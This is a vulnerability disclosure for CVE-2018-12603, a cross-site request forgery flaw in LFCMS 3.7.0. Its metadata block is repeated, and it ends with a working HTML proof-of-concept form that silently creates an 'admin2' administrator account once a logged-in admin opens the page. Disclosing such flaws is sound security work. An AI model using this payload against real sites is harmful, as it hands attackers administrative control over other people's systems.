CVE-2018-12603:LFCMS_3.7.0
CVE-2018-12603
> [Discoverer]
> Bay0net from JZXTSEC
> [Suggested description]
> A CSRF vulnerability exists in LFCMS 3.7.0: administrator account can be added arbitrarily.
> A CSRF vulnerability exists in LFCMS 3.7.0: administrator account can be added arbitrarily.
>
> ------------------------------------------
> > [Discoverer]
> Bay0net from JZXTSEC
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Request Forgery (CSRF)
>
> ------------------------------------------
>
>
> ------------------------------------------
>
> [Affected Product Code Base]
> LFCMS - 3.7.0
>
> ------------------------------------------
>
> [Affected Component]
> After the administrator logged in, open the following page,which will add users.
> https://www.cnblogs.com/v1vvwv/p/9203899.html
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Affected component
>
> ------------------------------------------
>
> [Reference]
> https://www.cnblogs.com/v1vvwv/p/9203899.html
> http://www.lfdycms.com/home/down/index/id/26.html
>
> ------------------------------------------
>
> [Affected Product Code Base]
> LFCMS - 3.7.0
>
> ------------------------------------------
>
> [Affected Component]
> After the administrator logged in, open the following page,which will add users.
> https://www.cnblogs.com/v1vvwv/p/9203899.html
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Affected component
>
> ------------------------------------------
>
> [Reference]
> https://www.cnblogs.com/v1vvwv/p/9203899.html
> http://www.lfdycms.com/home/down/index/id/26.html
>
> ------------------------------------------
A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily.
After the administrator logged in, open the following page,which will add administrator account.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST"> <input type="hidden" name="username" value="admin2" /> <input type="hidden" name="password" value="admin2" /> <input type="hidden" name="repassword" value="admin2" /> <input type="submit" value="Submit request" /> </form> </body> </html>
References:
http://www.lfdycms.com/
http://www.lfdycms.com/home/lists/index/id/60.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12603